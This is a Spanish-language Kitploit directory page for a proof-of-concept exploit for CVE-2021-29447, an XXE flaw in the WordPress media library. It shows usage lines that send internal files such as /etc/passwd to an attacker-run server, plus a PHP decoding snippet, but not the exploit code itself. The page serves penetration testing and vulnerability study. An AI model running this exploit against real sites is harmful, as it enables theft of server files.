Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-29447-PoC — Un exploit de prueba de concepto para una vulnerabilidad de la biblioteca multimedia de wordpress 5.6 | Kitploit
Herramientas/GitHubGitHub/0xrar/cve-2021-29447-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHub0xrar/cve-2021-29447-poc

CVE-2021-29447-PoC

Un exploit de prueba de concepto para una vulnerabilidad de la biblioteca multimedia de wordpress 5.6

Ver Repositorio
61hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-29447 Prueba de Concepto

root@kitploit:~
╔═╗╦  ╦╔═╗
║  ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Escrito por (Isa Ebrahim - 0xRar) en enero de 2023

═══════════════════════════════════════════════════════════════════════════
[*] Título: Problema de análisis XML en la librería multimedia de WordPress que conduce a XXE
[*] Versiones afectadas: Wordpress 5.6 - 5.7
[*] Versión parcheada: Wordpress 5.7.1
[*] Versión de instalación: PHP 8
═══════════════════════════════════════════════════════════════════════════

CVE-2021-29447: Un usuario con la capacidad de subir archivos (como un Autor) puede explotar un problema de análisis XML en la librería multimedia que conduce a ataques XXE. Esto requiere que la instalación de WordPress esté usando PHP 8. Es posible acceder a archivos internos en un ataque XXE exitoso. Esto ha sido parcheado en la versión 5.7.1 de WordPress, junto con las versiones afectadas anteriores a través de una versión menor.

Este script es fácil de entender y ejecutar, y automatizará los pasos necesarios para explotar el ataque XXE en la librería multimedia de WordPress.

Usage

root@kitploit:~
usage: PoC.py [-h] [-l LHOST] [-p PORT] [-f FILE]

options:
  -h, --help            show this help message and exit
  -l LHOST, --lhost LHOST  your server ip address e.g. 10.0.2.15
  -p PORT, --port PORT  your server port e.g. 1337
  -f FILE, --file FILE  system file to read e.g. /etc/passwd

Ejemplo:

root@kitploit:~
$ python3 PoC.py -l 10.0.2.15 -p 8000 -f /etc/passwd

Para decodificar el base64 use/ejecute el siguiente fragmento de PHP:

root@kitploit:~
<?php
echo zlib_decode(base64_decode('base64_here'));
?>
root@kitploit:~
$ php decode.php

  • Referencias:
    • https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
    • https://tryhackme.com/room/wordpresscve202129447
Descargar herramienta